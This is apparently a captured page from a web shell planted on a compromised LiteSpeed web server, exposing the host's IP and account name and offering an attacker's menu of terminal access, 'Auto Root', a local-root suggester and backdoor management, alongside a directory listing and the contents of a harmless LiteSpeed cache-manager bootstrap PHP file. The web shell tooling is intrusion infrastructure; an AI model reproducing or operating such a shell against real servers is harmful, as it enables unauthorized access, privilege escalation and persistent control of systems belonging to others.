Linux velvet.gennetworks.in 4.18.0-553.83.1.lve.el8.x86_64 #1 SMP Wed Nov 12 10:04:12 UTC 2025 x86_64
LiteSpeed
Server IP : 161.129.70.235 & Your IP : 216.73.216.5
Domains :
Cant Read [ /etc/named.conf ]
User : virtueex
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
lsws /
add-ons /
webcachemgr /
Delete
Unzip
Name
Size
Permission
Date
Action
src
[ DIR ]
drwxrwxr-x
2025-09-11 20:52
MIN_VER
7
B
-rw-r--r--
2026-02-18 16:18
VERSION
6
B
-rw-rw-r--
2025-09-11 20:52
autoloader.php
885
B
-rw-rw-r--
2025-09-11 20:52
bootstrap.php
513
B
-rw-rw-r--
2025-09-11 20:52
bootstrap_cli.php
531
B
-rw-rw-r--
2025-09-11 20:52
Save
Rename
<?php /** ********************************************* * LiteSpeed Web Server Cache Manager * * @author Michael Alegre * @copyright (c) 2018-2022 LiteSpeed Technologies, Inc. * ******************************************* */ use Lsc\Wp\Context\Context; use Lsc\Wp\Context\RootCLIContextOption; use Lsc\Wp\CliController; require_once __DIR__ . '/autoloader.php'; date_default_timezone_set('UTC'); /** @noinspection PhpUnhandledExceptionInspection */ Context::initialize(new RootCLIContextOption()); CliController::run();